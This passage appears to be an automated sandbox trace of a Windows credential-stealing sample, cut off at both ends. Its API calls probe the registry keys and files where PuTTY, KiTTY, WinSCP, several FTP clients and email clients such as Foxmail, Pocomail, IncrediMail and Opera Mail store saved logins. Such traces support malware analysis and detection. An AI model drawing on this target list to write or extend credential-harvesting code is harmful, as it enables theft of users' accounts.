out: phkResult=0x5ca8b0*=0x0) returned 0x2 [0114.894] GetProcessHeap () returned 0x5b0000 [0114.894] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0114.894] GetProcessHeap () returned 0x5b0000 [0114.894] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa40 [0114.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.897] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x5caa40 | out: phkResult=0x5caa40*=0x0) returned 0x2 [0114.897] GetProcessHeap () returned 0x5b0000 [0114.897] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa40 | out: hHeap=0x5b0000) returned 1 [0114.897] GetProcessHeap () returned 0x5b0000 [0114.897] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.897] GetProcessHeap () returned 0x5b0000 [0114.897] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0114.898] GetProcessHeap () returned 0x5b0000 [0114.898] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.898] GetProcessHeap () returned 0x5b0000 [0114.898] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0114.898] GetProcessHeap () returned 0x5b0000 [0114.898] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0114.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.899] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x5ca8d0 | out: phkResult=0x5ca8d0*=0x0) returned 0x2 [0114.899] GetProcessHeap () returned 0x5b0000 [0114.899] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0114.899] GetProcessHeap () returned 0x5b0000 [0114.899] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca930 [0114.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.900] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x5ca930 | out: phkResult=0x5ca930*=0x0) returned 0x2 [0114.900] GetProcessHeap () returned 0x5b0000 [0114.900] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca930 | out: hHeap=0x5b0000) returned 1 [0114.900] GetProcessHeap () returned 0x5b0000 [0114.900] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.901] GetProcessHeap () returned 0x5b0000 [0114.901] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0114.901] GetProcessHeap () returned 0x5b0000 [0114.901] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.901] GetProcessHeap () returned 0x5b0000 [0114.901] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0114.901] GetProcessHeap () returned 0x5b0000 [0114.901] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0114.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.903] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x5ca8b0 | out: phkResult=0x5ca8b0*=0x0) returned 0x2 [0114.903] GetProcessHeap () returned 0x5b0000 [0114.903] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0114.903] GetProcessHeap () returned 0x5b0000 [0114.903] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8e0 [0114.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.905] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x5ca8e0 | out: phkResult=0x5ca8e0*=0x0) returned 0x2 [0114.905] GetProcessHeap () returned 0x5b0000 [0114.905] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8e0 | out: hHeap=0x5b0000) returned 1 [0114.905] GetProcessHeap () returned 0x5b0000 [0114.905] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0114.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.907] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x5ca9f0 | out: phkResult=0x5ca9f0*=0x0) returned 0x2 [0114.907] GetProcessHeap () returned 0x5b0000 [0114.907] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0114.907] GetProcessHeap () returned 0x5b0000 [0114.907] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa40 [0114.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.910] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x5caa40 | out: phkResult=0x5caa40*=0x0) returned 0x2 [0114.910] GetProcessHeap () returned 0x5b0000 [0114.910] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa40 | out: hHeap=0x5b0000) returned 1 [0114.910] GetProcessHeap () returned 0x5b0000 [0114.911] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.911] GetProcessHeap () returned 0x5b0000 [0114.911] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0114.911] GetProcessHeap () returned 0x5b0000 [0114.911] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0114.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.912] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Thunderbird", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5cb930, pcbData=0xdfba4*=0x104 | out: pdwType=0x0, pvData=0x5cb930, pcbData=0xdfba4*=0x104) returned 0x2 [0114.913] GetProcessHeap () returned 0x5b0000 [0114.913] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.913] GetProcessHeap () returned 0x5b0000 [0114.913] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5cb930 [0114.914] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.915] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Foxmail\\mail", arglist=0xdfbb8 | out: param_1="C:\\Program Files (x86)\\Foxmail\\mail") returned 35 [0114.915] GetProcessHeap () returned 0x5b0000 [0114.915] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4a) returned 0x5c9390 [0114.915] GetProcessHeap () returned 0x5b0000 [0114.916] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.917] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Foxmail\\mail") returned 0 [0114.917] GetProcessHeap () returned 0x5b0000 [0114.917] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.918] GetProcessHeap () returned 0x5b0000 [0114.918] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.918] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x5c9390, nSize=0x104 | out: lpDst="C:") returned 0x3 [0114.919] Sleep (dwMilliseconds=0xa) [0114.942] GetProcessHeap () returned 0x5b0000 [0114.942] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cb930 [0114.942] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.943] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s", arglist=0xdf938 | out: param_1="C:\\Foxmail*") returned 11 [0114.943] GetProcessHeap () returned 0x5b0000 [0114.943] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1a) returned 0x5cb0d8 [0114.943] GetProcessHeap () returned 0x5b0000 [0114.944] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.944] FindFirstFileW (in: lpFileName="C:\\Foxmail*" (normalized: "c:\\foxmail*"), lpFindFileData=0xdf94c | out: lpFindFileData=0xdf94c*(dwFileAttributes=0x560055, ftCreationTime.dwLowDateTime=0x580057, ftCreationTime.dwHighDateTime=0x5a0059, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x640063, ftLastWriteTime.dwHighDateTime=0x660065, nFileSizeHigh=0x680067, nFileSizeLow=0x6a0069, dwReserved0=0x6c006b, dwReserved1=0x6e006d, cFileName="opqr\x08", cAlternateFileName="鎐\\Ą")) returned 0xffffffff [0114.945] GetProcessHeap () returned 0x5b0000 [0114.945] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0114.945] GetProcessHeap () returned 0x5b0000 [0114.945] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.945] GetProcessHeap () returned 0x5b0000 [0114.945] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f70) returned 0x5cb930 [0114.946] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.946] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Pocomail\\accounts.ini", arglist=0xdfb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 59 [0114.946] GetProcessHeap () returned 0x5b0000 [0114.946] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5c9390 [0114.946] GetProcessHeap () returned 0x5b0000 [0114.947] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.948] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 0 [0114.948] GetProcessHeap () returned 0x5b0000 [0114.948] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.948] GetProcessHeap () returned 0x5b0000 [0114.948] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.949] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.950] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0114.950] GetProcessHeap () returned 0x5b0000 [0114.950] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f70) returned 0x5cb930 [0114.951] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.952] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Pocomail\\accounts.ini", arglist=0xdfb50 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 53 [0114.952] GetProcessHeap () returned 0x5b0000 [0114.952] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6e) returned 0x5caba0 [0114.952] GetProcessHeap () returned 0x5b0000 [0114.952] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.953] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 0 [0114.954] GetProcessHeap () returned 0x5b0000 [0114.954] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0114.954] GetProcessHeap () returned 0x5b0000 [0114.954] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.954] GetProcessHeap () returned 0x5b0000 [0114.955] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.955] GetProcessHeap () returned 0x5b0000 [0114.955] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0114.955] GetProcessHeap () returned 0x5b0000 [0114.955] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0114.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.956] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x5ca8d0 | out: phkResult=0x5ca8d0*=0x0) returned 0x2 [0114.956] GetProcessHeap () returned 0x5b0000 [0114.956] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0114.956] GetProcessHeap () returned 0x5b0000 [0114.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8e0 [0114.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.958] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x5ca8e0 | out: phkResult=0x5ca8e0*=0x0) returned 0x2 [0114.958] GetProcessHeap () returned 0x5b0000 [0114.958] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8e0 | out: hHeap=0x5b0000) returned 1 [0114.958] GetProcessHeap () returned 0x5b0000 [0114.959] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.959] GetProcessHeap () returned 0x5b0000 [0114.959] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0114.959] GetProcessHeap () returned 0x5b0000 [0114.959] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5cb930 [0114.960] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.960] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\GmailNotifierPro\\ConfigData.xml", arglist=0xdfb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 69 [0114.960] GetProcessHeap () returned 0x5b0000 [0114.960] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8e) returned 0x5c9390 [0114.960] GetProcessHeap () returned 0x5b0000 [0114.961] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.962] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 0 [0114.962] GetProcessHeap () returned 0x5b0000 [0114.962] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.962] GetProcessHeap () returned 0x5b0000 [0114.963] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.963] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.964] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.964] GetProcessHeap () returned 0x5b0000 [0114.964] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6a) returned 0x5cb930 [0114.964] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.965] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\DeskSoft\\CheckMail", arglist=0xdfb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 56 [0114.965] GetProcessHeap () returned 0x5b0000 [0114.965] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x74) returned 0x5c6e90 [0114.965] GetProcessHeap () returned 0x5b0000 [0114.966] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.967] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 0 [0114.967] GetProcessHeap () returned 0x5b0000 [0114.967] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.967] GetProcessHeap () returned 0x5b0000 [0114.968] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6e90 | out: hHeap=0x5b0000) returned 1 [0114.968] GetProcessHeap () returned 0x5b0000 [0114.968] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.968] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.969] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.969] GetProcessHeap () returned 0x5b0000 [0114.969] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f7c) returned 0x5cb930 [0114.970] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.970] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\WinFtp Client\\Favorites.dat", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 50 [0114.970] GetProcessHeap () returned 0x5b0000 [0114.970] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x68) returned 0x5caba0 [0114.970] GetProcessHeap () returned 0x5b0000 [0114.971] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.972] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 0 [0114.972] GetProcessHeap () returned 0x5b0000 [0114.972] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0114.973] GetProcessHeap () returned 0x5b0000 [0114.973] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.973] GetProcessHeap () returned 0x5b0000 [0114.973] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.973] GetProcessHeap () returned 0x5b0000 [0114.973] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0114.973] GetProcessHeap () returned 0x5b0000 [0114.973] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0114.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.974] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x5ca8b0 | out: phkResult=0x5ca8b0*=0x0) returned 0x2 [0114.975] GetProcessHeap () returned 0x5b0000 [0114.975] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0114.975] GetProcessHeap () returned 0x5b0000 [0114.975] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa00 [0114.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.976] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x5caa00 | out: phkResult=0x5caa00*=0x0) returned 0x2 [0114.976] GetProcessHeap () returned 0x5b0000 [0114.976] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0114.976] GetProcessHeap () returned 0x5b0000 [0114.977] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.977] GetProcessHeap () returned 0x5b0000 [0114.977] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0114.977] GetProcessHeap () returned 0x5b0000 [0114.977] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.977] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.978] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Windows") returned 0x0 [0114.978] GetProcessHeap () returned 0x5b0000 [0114.978] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5cb930 [0114.979] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.979] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\32BitFtp.TMP", arglist=0xdfba0 | out: param_1="C:\\Windows\\32BitFtp.TMP") returned 23 [0114.979] GetProcessHeap () returned 0x5b0000 [0114.979] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x32) returned 0x5bdd88 [0114.979] GetProcessHeap () returned 0x5b0000 [0114.980] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.981] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.TMP") returned 0 [0114.981] GetProcessHeap () returned 0x5b0000 [0114.982] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bdd88 | out: hHeap=0x5b0000) returned 1 [0114.982] GetProcessHeap () returned 0x5b0000 [0114.982] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.982] GetProcessHeap () returned 0x5b0000 [0114.982] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.983] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.983] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Windows") returned 0x0 [0114.983] GetProcessHeap () returned 0x5b0000 [0114.983] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5cb930 [0114.984] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.985] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\32BitFtp.ini", arglist=0xdfb94 | out: param_1="C:\\Windows\\32BitFtp.ini") returned 23 [0114.985] GetProcessHeap () returned 0x5b0000 [0114.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x32) returned 0x5bde48 [0114.985] GetProcessHeap () returned 0x5b0000 [0114.985] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.986] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.ini") returned 0 [0114.987] GetProcessHeap () returned 0x5b0000 [0114.987] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bde48 | out: hHeap=0x5b0000) returned 1 [0114.987] GetProcessHeap () returned 0x5b0000 [0114.987] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.987] GetProcessHeap () returned 0x5b0000 [0114.987] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.988] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x5c9390, nSize=0x104 | out: lpDst="C:") returned 0x3 [0114.988] GetProcessHeap () returned 0x5b0000 [0114.988] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f78) returned 0x5cb930 [0114.991] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.991] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTP Navigator\\Ftplist.txt", arglist=0xdfba0 | out: param_1="C:\\FTP Navigator\\Ftplist.txt") returned 28 [0114.991] GetProcessHeap () returned 0x5b0000 [0114.991] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3c) returned 0x5bbb88 [0114.992] GetProcessHeap () returned 0x5b0000 [0114.992] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.994] PathFileExistsW (pszPath="C:\\FTP Navigator\\Ftplist.txt") returned 0 [0114.994] GetProcessHeap () returned 0x5b0000 [0114.995] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bbb88 | out: hHeap=0x5b0000) returned 1 [0114.995] GetProcessHeap () returned 0x5b0000 [0114.995] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.995] GetProcessHeap () returned 0x5b0000 [0114.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.996] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x5c9390, nSize=0x104 | out: lpDst="C:") returned 0x3 [0114.996] GetProcessHeap () returned 0x5b0000 [0114.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f92) returned 0x5cb930 [0114.997] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.997] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Softwarenetz\\Mailing\\Daten\\mailing.vdt", arglist=0xdfb40 | out: param_1="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 41 [0114.997] GetProcessHeap () returned 0x5b0000 [0114.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x56) returned 0x5caba0 [0114.997] GetProcessHeap () returned 0x5b0000 [0114.998] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.999] PathFileExistsW (pszPath="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 0 [0114.999] GetProcessHeap () returned 0x5b0000 [0114.999] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0114.999] GetProcessHeap () returned 0x5b0000 [0115.000] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.000] GetProcessHeap () returned 0x5b0000 [0115.000] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f82) returned 0x5cb930 [0115.001] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.001] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Opera Mail\\Opera Mail\\wand.dat", arglist=0xdfb4c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 68 [0115.001] GetProcessHeap () returned 0x5b0000 [0115.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8c) returned 0x5c9390 [0115.001] GetProcessHeap () returned 0x5b0000 [0115.002] HeapFree (in: 